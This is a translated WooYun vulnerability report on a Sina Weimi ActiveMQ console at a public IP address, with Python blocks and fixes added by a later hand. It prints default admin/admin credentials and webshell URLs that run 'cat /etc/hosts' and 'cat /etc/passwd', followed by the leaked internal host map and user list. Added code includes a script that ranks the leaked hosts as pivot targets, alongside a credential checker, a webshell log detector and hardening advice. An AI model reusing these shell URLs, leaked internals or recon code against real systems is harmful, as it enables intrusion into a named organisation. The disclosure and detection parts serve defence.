
Sina Weimi: weak password on a system gives getshell / root privileges / intranet access

ID: 224381
URL: http://www.wooyun.org/bug.php?action=view&id=224381
Status: Vulnerability reported to the vendor, but the vendor ignored it
Title: Sina Weimi: weak password on a system gives getshell / root privileges / intranet access
Type: Command execution
Vendor: Sina
White hat: 路人甲
Submitted: 2016-06-29 13:58:00
Published: 2016-07-04 10:30:00
Fixed: (not set)
Confirmed: 0000-00-00 00:00:00
Confirm Spend: -1
Tags: Remote command execution
Followers: 0
Favorites: 0
White-hat rating:
White-hat self-assessed rank: 12
Vendor rating:
Vendor rank: 0
Summary
As the title says.
Details

Since everyone has been submitting to Sina, I'll follow the gods' lead and fire one off too.



http://183.136.160.234:8161/
ActiveMQ web console with the default weak password: admin / admin
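How a tester or defender checks for exactly this finding, as an added example that is not from the report: send the logins ActiveMQ 5.x ships in conf/jetty-realm.properties (admin/admin, user/user) over HTTP Basic and record which ones the console accepts. The target URL and credential list are assumptions, and the fake console at the bottom is a constructed stand-in for a real host:8161 so the script runs offline.

```python
"""Audit an ActiveMQ web console (Jetty, port 8161 by default) for the
shipped HTTP Basic credentials. Added example, not part of the original
report; the credential list and the fake console are assumptions."""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Defaults from ActiveMQ 5.x conf/jetty-realm.properties
DEFAULT_CREDS = [("admin", "admin"), ("user", "user")]


def basic_header(user, password):
    """Value of the Authorization header for HTTP Basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def try_login(base_url, user, password, timeout=5):
    """True if the console serves /admin/ (HTTP 200) for user:password,
    False on 401/403; any other HTTP error is re-raised for the caller."""
    req = urllib.request.Request(base_url.rstrip("/") + "/admin/")
    req.add_header("Authorization", basic_header(user, password))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode() == 200
    except urllib.error.HTTPError as err:
        if err.code in (401, 403):
            return False
        raise


def audit_console(base_url, creds=DEFAULT_CREDS):
    """Return every (user, password) pair the console accepts."""
    return [(u, p) for u, p in creds if try_login(base_url, u, p)]


# Constructed stand-in for a console that still has the shipped admin/admin.
class _FakeConsole(BaseHTTPRequestHandler):
    ACCEPT = basic_header("admin", "admin")

    def do_GET(self):
        if self.headers.get("Authorization") == self.ACCEPT:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"<html>ActiveMQ console</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'basic realm="ActiveMQRealm"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_console():
    """Bind the fake console on a free loopback port; returns (server, url)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeConsole)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


if __name__ == "__main__":
    srv, url = start_fake_console()
    try:
        print(audit_console(url))  # [('admin', 'admin')] against the fake console
    finally:
        srv.shutdown()
```

Against a real broker, replace the fake console's URL with the host under test; a non-empty result is the finding on this page.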



http://183.136.160.234:8161/admin/test/sex.jsp
http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts
Looks like this goes straight into the intranet..

# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
202.106.184.152 interface.blog.sina.com.cn
10.0.8.32 datacube_mongo
#shequ
10.221.149.246 shequ.dev.weimi.me
#hdfs
#10.0.8.123 wemeetcluster
10.0.8.103 storage.intra.ilianmeng.com
10.0.8.103 test2.live.intra.ilianmeng.com
10.0.8.32 matrix_registry_1
10.0.8.32 matrix_registry_2
10.0.8.32 matrix_registry_3 mongodb_server
10.0.8.32 matrixmc_1 matrixuuid_1
10.0.8.32 matrixmc_2 matrixuuid_2
10.0.8.32 matrixmc_3 matrixuuid_3
10.0.8.32 matrixmc_4 matrixuuid_4
10.0.8.32 matrixdb m_api_db.intra.ilianmeng.com
10.0.8.32 s_api_db.intra.ilianmeng.com
10.0.8.32 matrixredis_1
10.0.8.32 matrixredis_2
10.0.8.32 matrixredis_3
10.0.8.32 matrixredis_4
10.0.8.103 sentinel_host_1
10.0.8.103 sentinel_host_2
10.0.8.32 sentinel_host_3
10.0.8.32 pushserver push.intra.ilianmeng.com
10.0.8.10 node10.intra.hiwemeet.com
10.0.8.32 node11.intra.hiwemeet.com
10.0.8.103 node103.intra.ilianmeng.com img.intra.ilianmeng.com amq.intra.ilianmeng.com searchService neo4j_server search.intra.ilianmeng.com test2.api.intra.ilianmeng.com test2.img.ilianmeng.com test2.img.intra.ilianmeng.com
10.0.8.13 node13.intra.hiwemeet.com
10.0.8.14 node14.intra.hiwemeet.com
10.0.8.2 node2.intra.hiwemeet.com
10.0.8.3 node3.intra.hiwemeet.com
10.0.8.4 node4.intra.hiwemeet.com
10.0.8.5 node5.intra.hiwemeet.com
10.0.8.6 node6.intra.hiwemeet.com
10.0.8.7 node7.intra.hiwemeet.com
10.0.8.8 node8.intra.hiwemeet.com
10.0.8.9 node9.intra.hiwemeet.com
10.0.8.15 salt yum.intra.hiwemeet.com node15.intra.hiwemeet.com statsdserver repo.hiwemeet.com
10.0.8.43 node43.intra.hiwemeet.com baokumc_1 baokumc_2 baokumc_3 baokumc_4 s_api_db.intra.baoku.com m_api_db.intra.baoku.com
10.0.8.44 node44.intra.hiwemeet.com
10.0.8.45 node45.intra.hiwemeet.com
10.0.8.102 node102.intra.hiwemeet.com sub.intra.hiwemeet.com
10.0.8.103 node103.intra.hiwemeet.com sub.intra.ilianmeng.com
10.0.8.102 couchbase115 couchbase116
10.0.8.103 couchbase117 couchbase118
10.0.8.6 redis1.shihui.com
10.0.8.32 s_shihui_db.intra.ilianmeng.com s_shihui_db.intra.hiwemeet.com
10.0.8.32 m_shihui_db.intra.ilianmeng.com m_shihui_db.intra.hiwemeet.com
10.0.8.235 redis2.shihui.com
10.0.8.235 redis3.shihui.com
10.0.8.235 shihuiredis_1
10.0.8.235 shihuiredis_2
10.0.8.235 shihuiredis_3
10.0.8.235 shihuiredis_4
10.0.8.32 shihuimc_1
10.0.8.32 shihuimc_2
10.0.8.32 shihuimc_3
10.0.8.32 shihuimc_4
10.0.8.103 test2.img.intra.ilianmeng.com
10.0.8.103 test2.scorpio.ilianmeng.com
10.0.8.107 static.17shihui.cn
10.0.8.103 api.ilianmeng.com
10.0.8.103 dev.scorpio.ilianmeng.com
10.0.8.32 test2.search.user.db.host search.user.db.host
10.0.8.43 51baokuredis_1
10.0.8.43 51baokuredis_2
10.0.8.43 51baoku_uuid_1
10.0.8.43 51baoku_uuid_2
10.0.8.43 m_db.intra.51baoku.com
10.0.8.43 s_db.intra.51baoku.com
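What an attacker (or the incident responder retracing them) does with a leaked /etc/hosts like the one above: turn it into an inventory of internal addresses and their likely roles. Added example, not part of the report; SAMPLE is an excerpt of the /etc/hosts output shown above, and the role keywords are assumptions about the naming habits visible in it.

```python
"""Parse a leaked /etc/hosts into a pivot inventory: which internal IPs
carry which roles, judged from alias names. Added example, not from the
report. SAMPLE is an excerpt of the report's /etc/hosts; ROLE_PATTERNS
are assumptions about naming conventions."""
import ipaddress
import re
from collections import Counter

SAMPLE = """\
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
202.106.184.152 interface.blog.sina.com.cn
10.0.8.32 datacube_mongo
#shequ
10.221.149.246 shequ.dev.weimi.me
#10.0.8.123 wemeetcluster
10.0.8.32 matrix_registry_3 mongodb_server
10.0.8.32 matrixdb m_api_db.intra.ilianmeng.com
10.0.8.32 matrixredis_1
10.0.8.103 sentinel_host_1
10.0.8.15 salt yum.intra.hiwemeet.com node15.intra.hiwemeet.com statsdserver repo.hiwemeet.com
10.0.8.43 node43.intra.hiwemeet.com baokumc_1 s_api_db.intra.baoku.com
10.0.8.102 couchbase115 couchbase116
10.0.8.6 redis1.shihui.com
10.0.8.235 shihuiredis_1
10.0.8.107 static.17shihui.cn
"""

# alias regex -> role (assumed naming conventions, order matters only for reading)
ROLE_PATTERNS = [
    (re.compile(r"mongo"), "mongodb"),
    (re.compile(r"sentinel"), "redis-sentinel"),
    (re.compile(r"redis"), "redis"),
    (re.compile(r"mc_\d"), "memcached"),
    (re.compile(r"couchbase"), "couchbase"),
    (re.compile(r"(?:^|[._])db(?:$|[._])|db$"), "sql-db"),
    (re.compile(r"^salt$"), "salt-master"),
    (re.compile(r"registry"), "registry"),
    (re.compile(r"^(?:yum|repo)\."), "package-repo"),
]
DATA_STORE_ROLES = {"mongodb", "redis", "memcached", "couchbase", "sql-db"}


def roles_for(alias):
    return {role for pat, role in ROLE_PATTERNS if pat.search(alias)}


def parse_hosts(text):
    """Return {ip: {"aliases": [...], "roles": set, "private": bool}}.
    Comments and commented-out entries are dropped, loopback is skipped."""
    inv = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *aliases = line.split()
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue  # not a hosts entry
        if ip.is_loopback:
            continue
        entry = inv.setdefault(str(ip), {"aliases": [], "roles": set(),
                                         "private": ip.is_private})
        entry["aliases"].extend(aliases)
        for alias in aliases:
            entry["roles"] |= roles_for(alias)
    return inv


def pivot_targets(inv):
    """Hosts carrying data stores, in address order: the first pivot targets."""
    hits = [(ip, sorted(e["roles"] & DATA_STORE_ROLES))
            for ip, e in inv.items() if e["roles"] & DATA_STORE_ROLES]
    return sorted(hits, key=lambda t: ipaddress.ip_address(t[0]))


def subnet_counts(inv):
    """Named hosts per IPv4 /24: tells you which ranges are worth a sweep."""
    counts = Counter()
    for ip in inv:
        if ipaddress.ip_address(ip).version == 4:
            counts[str(ipaddress.ip_network(f"{ip}/24", strict=False))] += 1
    return counts


if __name__ == "__main__":
    inventory = parse_hosts(SAMPLE)
    for ip, roles in pivot_targets(inventory):
        print(ip, roles)
    print(subnet_counts(inventory))
```

Run on the full listing above it is 10.0.8.0/24 that lights up, with 10.0.8.32 alone carrying MongoDB, Redis, a SQL database and a registry; that single hosts file is the attacker's internal map, which is why an RCE on an edge box is rated by what it can reach, not by what it runs.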




http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:134:134:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:495:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
luci:x:141:141:luci high availability management application:/var/lib/luci:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:494:488:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
yuanming:x:501:501::/home/yuanming:/bin/bash
haibo:x:502:502::/home/haibo:/bin/bash
gaozhi:x:503:503::/home/gaozhi:/bin/bash
hanjian:x:504:504::/home/hanjian:/bin/bash
liuxin:x:505:505::/home/liuxin:/bin/bash
yiqian:x:506:506::/home/yiqian:/bin/bash
yifeng:x:507:507::/home/yifeng:/bin/bash
www:x:508:508::/home/www:/bin/bash
couchbase:x:493:486:couchbase system user:/opt/couchbase:/bin/sh
nginx:x:492:485:Nginx web server:/var/lib/nginx:/sbin/nologin
td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin
yongrong:x:509:509::/home/yongrong:/bin/bash
baoku:x:510:10::/home/baoku:/bin/bash
yuwenlong:x:511:511::/home/yuwenlong:/bin/bash
jizheng:x:512:10::/home/jizheng:/bin/bash
zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash


That's all I'll prove.
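The defender's side of the two command URLs above: the shell's commands travel URL-encoded in a query parameter, so a detection has to decode before matching. Added example, not part of the report; LOG is a set of constructed NCSA-style access-log lines modelled on the report's URLs, and since the report does not say how the JSP reached the server, the write-method rule is a general check rather than a reconstruction of this attack.

```python
"""Flag JSP-webshell traffic in web access logs. Added example for
defenders, not part of the original report. LOG is constructed
NCSA-style log lines modelled on the report's URLs."""
import re
import urllib.parse
from collections import Counter
from dataclasses import dataclass, field

LOG = """\
1.2.3.4 - - [29/Jun/2016:13:40:01 +0800] "GET /admin/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
1.2.3.4 - - [29/Jun/2016:13:41:12 +0800] "PUT /admin/test/sex.jsp HTTP/1.1" 204 0 "-" "python-requests/2.9"
1.2.3.4 - - [29/Jun/2016:13:42:30 +0800] "GET /admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
1.2.3.4 - - [29/Jun/2016:13:43:05 +0800] "GET /admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd HTTP/1.1" 200 2990 "-" "Mozilla/5.0"
10.0.8.5 - - [29/Jun/2016:13:45:00 +0800] "GET /admin/queues.jsp HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
10.0.8.5 - - [29/Jun/2016:13:46:00 +0800] "GET /admin/browse.jsp?JMSDestination=cmd.queue HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# parameter names one-file JSP shells commonly use (assumed list)
SHELL_PARAMS = {"cmd", "command", "exec", "c"}
# methods that write into a webapp; a console should never see them
WRITE_METHODS = {"PUT", "MOVE", "DELETE"}
# decoded values that look like a shell command rather than console input
COMMAND_RE = re.compile(
    r"(?:^|[\s;|&])(?:cat|ls|id|whoami|uname|wget|curl|bash|sh|nc|python|perl)(?:\s|$)"
    r"|/etc/(?:passwd|hosts|shadow)|[;|&`$]")


@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    path: str
    reasons: list = field(default_factory=list)


def inspect_line(line):
    """Return a Finding for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    method, target = m["method"], m["target"]
    url = urllib.parse.urlsplit(target)
    reasons = []
    if method in WRITE_METHODS:
        reasons.append(f"write method {method} against console path")
    # parse_qs percent-decodes, so "cat%20/etc/hosts" is matched as "cat /etc/hosts"
    for name, values in urllib.parse.parse_qs(url.query).items():
        if name.lower() in SHELL_PARAMS:
            for value in values:
                if COMMAND_RE.search(value):
                    reasons.append(f"command in parameter {name}: {value}")
    if not reasons:
        return None
    return Finding(m["ip"], m["ts"], method, url.path, reasons)


def scan(log_text):
    """All findings in a log, in file order."""
    return [f for f in (inspect_line(l) for l in log_text.splitlines()) if f]


def by_source(findings):
    """Findings per client address, to see who is driving the shell."""
    return Counter(f.ip for f in findings)


if __name__ == "__main__":
    hits = scan(LOG)
    for f in hits:
        print(f.ts, f.ip, f.method, f.path, "; ".join(f.reasons))
    print(by_source(hits))
```

The two console lines from 10.0.8.5 stay quiet even though one carries "cmd" inside a queue name, because the rule keys on the parameter name and on the decoded value's shape, not on the substring alone.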

POC

The two command-execution URLs above; the /etc/passwd listing they return is the one shown in the details.

Fix

Weak password. The chain on this page is two things: the ActiveMQ web console on 183.136.160.234:8161 still accepts the shipped admin/admin login, and a JSP command shell (/admin/test/sex.jsp) now sits inside the console webapp and, per the title, runs its commands as root. So: change the console credentials to a unique, strong password; remove the JSP shell and check the webapp directory for any other file that did not ship with the broker; keep port 8161 off the Internet (a management network or VPN; here it answers on a public address); and run the broker under an unprivileged account so a shell in the console does not start out as root.
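The file behind the finding, shown as an added example rather than anything taken from the report: on ActiveMQ 5.x the console's HTTP Basic users live in conf/jetty-realm.properties, one "name: password, role" line each. The first two lines are the shipped defaults; the last is the hardened form, and the password placeholder is an assumption.

```properties
# conf/jetty-realm.properties as shipped with ActiveMQ 5.x. These two
# lines are why admin/admin works against http://host:8161/admin/
admin: admin, admin
user: user, user

# Hardened replacement: a single admin with a long random secret
# (placeholder below), no "user" account, and the file readable only
# by the broker's service account.
admin: REPLACE-WITH-A-LONG-RANDOM-SECRET, admin
```

The console also binds to all interfaces by default (the host property in conf/jetty.xml); set it to a management address or firewall port 8161 as well, since a strong password on an Internet-facing console is still one leaked credential away from this page.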

Status: 2016-06-29: details sent to the vendor, awaiting vendor handling
2016-07-04: vendor actively ignored the vulnerability; details published
Vendor reply: Please submit directly to Weimi's official channel to get it fixed.
Response: Severity: no impact. Vendor ignored. Ignored at: 2016-07-04 10:30
Comments (content / commenter / likes / time)

@洋葱 gonna eat you

j14n / 0 / 2016-06-30 15:27:00

Weak password... 洋葱 grabbing a seat

洋葱 / 0 / 2016-06-30 15:16:00